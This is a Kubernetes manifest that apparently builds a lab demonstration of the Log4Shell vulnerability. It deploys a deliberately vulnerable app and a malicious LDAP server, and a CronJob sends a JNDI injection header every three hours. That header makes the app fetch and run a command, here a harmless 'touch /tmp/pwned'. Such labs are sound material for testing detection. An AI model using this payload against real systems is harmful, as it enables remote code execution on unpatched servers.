---
apiVersion: batch/v1
kind: CronJob
metadata:
  name: trigger-log4j
spec:
  schedule: "0 */3 * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: trigger-log4j
            image: busybox
            imagePullPolicy: IfNotPresent
            command:
            - /bin/sh
            - -c
            - >
              curl http://log4j-exploit-svc:8080 -H 'X-Api-Version: ${jndi:ldap://log4j-ldap-svc:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
          restartPolicy: OnFailure
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: log4j-exploit-app
spec:
  selector:
    matchLabels:
      app: log4j-exploit-app
  replicas: 1
  template:
    metadata:
      labels:
        app: log4j-exploit-app
    spec:
      containers:
      - name: log4j-exploit-app
        image: ghcr.io/christophetd/log4shell-vulnerable-app:latest
        imagePullPolicy: Always
        ports:
        - containerPort: 8080
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: log4j-ldap-server
spec:
  selector:
    matchLabels:
      app: log4j-ldap-server
  replicas: 1
  template:
    metadata:
      labels:
        app: log4j-ldap-server
    spec:
      containers:
      - name: log4j-ldap-server
        image: harbor.lab.internal/demo/log4j-ldap-server:dev
        imagePullPolicy: Always
        args:
          - "exploit"
        env:
        - name: TARGET_IP_ADDRESS
          value: 'log4j-ldap-svc'
        - name: TARGET_TCP_PORT
          value: '8888'
---
apiVersion: v1
kind: Service
metadata:
  name: log4j-exploit-svc
  labels:
    app: log4j-exploit-svc
spec:
  ports:
  - port: 8080
    name: log4j-exploit-port
    targetPort: 8080
    protocol: TCP
  selector:
    app: log4j-exploit-app
---
apiVersion: v1
kind: Service
metadata:
  name: log4j-ldap-svc
  labels:
    app: log4j-ldap-svc
spec:
  ports:
  - port: 8888
    name: log4j-http-port
    targetPort: 8888
    protocol: TCP
  - port: 1389
    name: log4j-ldap-port
    targetPort: 1389
    protocol: TCP
  selector:
    app: log4j-ldap-server
